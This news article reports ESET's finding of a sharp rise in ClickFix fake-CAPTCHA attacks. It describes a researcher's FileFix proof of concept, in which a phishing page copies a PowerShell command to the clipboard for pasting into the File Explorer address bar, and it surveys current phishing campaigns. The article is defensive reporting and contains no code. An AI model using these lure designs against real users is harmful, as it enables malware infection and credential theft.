Rise of ClickFix: A New Security Threat

June 26, 2025, by Ravie Lakshmanan
Tags: Cyber Attack / Malware Analysis

Understanding ClickFix

Recent reports from ESET highlight a worrying trend: the ClickFix social engineering tactic has seen an astounding increase of 517% as an initial access vector through fake CAPTCHA verifications between the second half of 2024 and the first half of 2025. This alarming growth raises concerns about cybersecurity vulnerabilities and the need for increased awareness among users and organizations.

According to Jiří Kropáč, Director of Threat Prevention Labs at ESET, the spectrum of threats arising from ClickFix is rapidly expanding. This tactic is paving the way for various malicious activities, including information theft, ransomware attacks, remote access trojans, cryptominers, post-exploitation tools, and even sophisticated malware from state-sponsored actors.

What is ClickFix?

ClickFix leverages deceptive tactics that involve fake error messages or CAPTCHA validations, coaxing users into copying and pasting malicious code into their systems. Users often paste this code into the Windows Run dialog or the Apple macOS Terminal app, unwittingly executing harmful commands.

ESET’s report indicates that the regions most affected by ClickFix attacks include Japan, Peru, Poland, Spain, and Slovakia. The popularity of this approach has led malicious actors to promote tools that enable other attackers to create ClickFix-weaponized landing pages, thereby amplifying the reach of these cyber threats.

Introducing FileFix: A New Tactic

Recently, security researcher mrd0x introduced a novel proof-of-concept technique named FileFix. This method represents a different approach to trick users into executing commands by copying file paths in Windows File Explorer.

FileFix operates on a similar principle to ClickFix but varies in execution. It uses the functionality of Windows File Explorer, which can accept commands through its address bar, allowing attackers to engineer a scenario that persuades users to paste a harmful command.

How FileFix Works

In a typical attack scenario devised by researcher mrd0x, a phishing page presents users with a message indicating that a document has been shared with them. Victims are instructed to press CTRL + L and paste a file path into the address bar, believing it’s the required action to access shared content.

The phishing page also features a noticeable "Open File Explorer" button. Clicking this button opens File Explorer while simultaneously copying a malicious PowerShell command to the clipboard. Consequently, when users paste what they think is the file path, they inadvertently execute the command, facilitating the attack.

Evolving Phishing Campaigns

The surge in ClickFix tactics has coincided with an increase in phishing campaigns. These campaigns are diversifying in their approach, utilizing various techniques to compromise users’ information:

• Government Domain Phishing: Some scams employ .gov domains to make phishing emails appear legitimate, tricking users into providing personal and financial details.

• Strategic Domain Aging: Using long-lived domains, attackers host custom CAPTCHA pages, subsequently redirecting victims to counterfeit Microsoft Teams pages aimed at stealing login credentials.

• Malicious File Distribution: Cybercriminals are sending out ZIP archives containing Windows shortcut (LNK) files, which execute PowerShell commands to install the Remcos RAT malware on users’ systems.

• Urgent Email Alerts: Emails warning users of full mailboxes prompt them to click links that direct them to phishing sites. This tactic often includes infected attachments that deploy the XWorm malware.

• Complex URL Schemes: Some attackers use URLs leading to PDFs, which contain further links to ZIP files harboring executables for launching malware, such as the AutoIT-based Lumma Stealer.

• Impersonating Government Entities: Scammers impersonate state Departments of Motor Vehicles through SMS messages regarding alleged unpaid tolls, redirecting victims to fraudulent sites to collect sensitive information.

• Exploiting SharePoint: Phishing campaigns leveraging SharePoint-themed emails redirect users to credential harvesting pages hosted on domains that mimic Microsoft services, making them less likely to be flagged by security software.

CyberProof has noted that emails with SharePoint links tend to evade detection, as they appear safer to users. Hosted on dynamic SharePoint sites, these phishing pages are often accessible only through specific links for limited durations, complicating efforts to detect and mitigate such threats.

For continued updates on cybersecurity trends and techniques, follow us on Twitter and LinkedIn.